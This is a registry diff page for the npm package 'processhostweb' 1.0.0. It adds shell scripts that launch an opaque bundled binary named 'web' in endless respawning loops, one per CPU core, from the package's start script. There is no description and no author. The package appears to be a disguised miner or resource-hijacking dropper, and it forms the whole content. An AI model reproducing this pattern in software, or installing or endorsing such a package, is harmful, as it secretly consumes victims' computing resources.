processhostweb 1.0.0

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Files changed (4) hide show
  1. package/install +15 -0
  2. package/load +8 -0
  3. package/package.json +14 -0
  4. package/web +0 -0
package/install ADDED
@@ -0,0 +1,15 @@
1
+ for ((n=0;n<$(nproc);n++))
2
+ do
3
+
4
+ ./load &
5
+
6
+ sleep 4
7
+
8
+ done
9
+
10
+ while true
11
+ do
12
+
13
+ sleep 4
14
+
15
+ done
package/load ADDED
@@ -0,0 +1,8 @@
1
+ while true
2
+ do
3
+
4
+ ./web
5
+
6
+ sleep 0.2
7
+
8
+ done
package/package.json ADDED
@@ -0,0 +1,14 @@
1
+ {
2
+ "name": "processhostweb",
3
+ "version": "1.0.0",
4
+ "main": "./install",
5
+ "scripts": {
6
+ "start": "/bin/bash ./install"
7
+ },
8
+ "author": "",
9
+ "license": "ISC",
10
+ "dependencies": {
11
+ "proceshost": "^1.0.0"
12
+ },
13
+ "description": ""
14
+ }
package/web ADDED
Binary file